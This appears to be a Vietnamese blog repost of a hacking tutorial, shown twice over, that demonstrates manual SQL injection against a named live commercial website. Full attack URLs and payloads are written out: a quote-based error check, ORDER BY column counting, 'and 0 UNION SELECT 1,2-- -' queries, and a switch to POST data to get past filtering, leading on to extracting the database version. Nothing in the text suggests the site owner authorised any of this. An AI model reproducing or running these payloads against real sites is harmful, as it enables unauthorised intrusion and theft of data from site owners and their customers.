Bài liên quan
Đầu tiên chúng ta cùng nhìn site này
Bước 1: Check lỗi
![[Hình: data487c4.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_t6QSGQU6NW74F5HZqzqM7kzyUq5h_Sgn47WzAm0IMR1gJPtC-wtuvYnBlY9PtWVB-3CZCSF940BJ4-uCuHQM8iuKDAhLjLKercRiIL7GDzbD7PTvNdCHKmCnh2=s0-d)
Bước 2: Tìm số trường cột
![[Hình: data2.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vZ04lUndAV7dGpPB3CNBC8Xt8SbV7dGFX24ubi1YTU5G-wjcVUxTWL65Z-t12vmIGeSzdDuZNsGKLziK2A-0DtSRJjYUHZ2NLTtB5CmXTiHrDgcyeF09M=s0-d)
![[Hình: data1.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_v8GaIqNfpV4S5DU4nIbvZgqXF5T_1MTl1myKjsxYmqxxtaZ7q8iAKntEOY-utcKF_OWBwbGslJoNPL3_AFDS9hoiHx9cVju7xyhwqsOEuELlX1V8wVY-A=s0-d)
Số trường cột cần tìm là 2
Bước 3: Xác định vị trí trường cột bị lỗi
![[Hình: data3.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_shl_5RTiBXliwdznTw64uEP_6tfjHM_F-pxe8nZ9aDem-7OT__AgakHcCjzEvzFa7IR3jCWtVVow6c3mEKhFI3mW3cmTdZbNmFVm8m59xjBjoX5MfxJho=s0-d)
Sau khi thử mọi cách bypass mà vẫn chưa tìm ra kết quả nên mình chuyển qua phương pháp Post data bằng cách đem: id_catg=206 and 0 UNION SELECT 1,2-- -xuống như trong hình:
![[Hình: data6.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vTIOK88MGGnXsZv5LPMIUeQ5l7PhhRd-_umRpHbzyZlbtDnFlY3-OwdPfT1cjbXM8X8GzD_xZHvid-kqzgbavUBD6ByCWiaFsRSJ9yRQ7Vf30PWBuDvoU=s0-d)
Sau đó nhấn chữ Execute thì chúng ta sẽ có kết quả
![[Hình: data4.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_tFAyMaRilJ_oyZULpopREIFzaL9424LnMWbKKLPWcjk62NeU3Eb5Dn5o4UOPtdri_WVrgA_JZtMvOH1E5CHR0qOoPfVCMQAdhasp7-RyqRupE03rigDEI=s0-d)
Tiếp theo chúng ta tìm version
![[Hình: data5.jpg]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_sWL64peaLf1oSfQ2UU6wo3Cr9qhp1CXobfd9Jl7u3LH5NgPR6c2kUo9go7azjb-oZK64UAPaoMYQKqXI0jzsiBM75lk3WKK69inevW8SiKcxWiq2VliwU=s0-d)
....
P/S: Vì không biết nên đặt tiêu đề như thế nào cho đúng nên nếu sai tiêu đề thì rất mong các bạn thông cảm.
Nguồn CEH
Mã PHP:
http://www.hometheater.co.il/modules.php?name=Sale&op=ViewCatg&id_catg=206 Bước 1: Check lỗi
Mã PHP:
http://www.hometheater.co.il/modules.php?name=Sale&op=ViewCatg&id_catg=206' ![[Hình: data487c4.png]](http://www.upsieutoc.com/images/2014/06/08/data487c4.png)
Giao diện website có thay đổi. Chứng tỏ site bị lỗi.
Bước 2: Tìm số trường cột
Mã PHP:
http://www.hometheater.co.il/modules.php?name=Sale&op=ViewCatg&id_catg=206 order by 2-- - ![[Hình: data2.jpg]](http://www.upsieutoc.com/images/2014/06/08/data2.jpg)
Giao diện website vẫn bình thường
Mã PHP:
http://www.hometheater.co.il/modules.php?name=Sale&op=ViewCatg&id_catg=206 order by 3-- - ![[Hình: data1.jpg]](http://www.upsieutoc.com/images/2014/06/08/data1.jpg)
Giao diện website thay đổi
Số trường cột cần tìm là 2
Bước 3: Xác định vị trí trường cột bị lỗi
Mã PHP:
http://www.hometheater.co.il/modules.php?name=Sale&op=ViewCatg&id_catg=206 and 0 UNION SELECT 1,2-- - ![[Hình: data3.jpg]](http://www.upsieutoc.com/images/2014/06/08/data3.jpg)
Không tìm thấy cột lỗi
Sau khi thử mọi cách bypass mà vẫn chưa tìm ra kết quả nên mình chuyển qua phương pháp Post data bằng cách đem: id_catg=206 and 0 UNION SELECT 1,2-- -xuống như trong hình:
![[Hình: data6.jpg]](http://www.upsieutoc.com/images/2014/06/08/data6.jpg)
Sau đó nhấn chữ Execute thì chúng ta sẽ có kết quả
![[Hình: data4.jpg]](http://www.upsieutoc.com/images/2014/06/08/data4.jpg)
Lỗi cột 1
Tiếp theo chúng ta tìm version
![[Hình: data5.jpg]](http://www.upsieutoc.com/images/2014/06/08/data5.jpg)
P/S: Vì không biết nên đặt tiêu đề như thế nào cho đúng nên nếu sai tiêu đề thì rất mong các bạn thông cảm.
Nguồn CEH
Post a Comment
EmoticonClick to see the code!
To insert emoticon you must added at least one space before the code.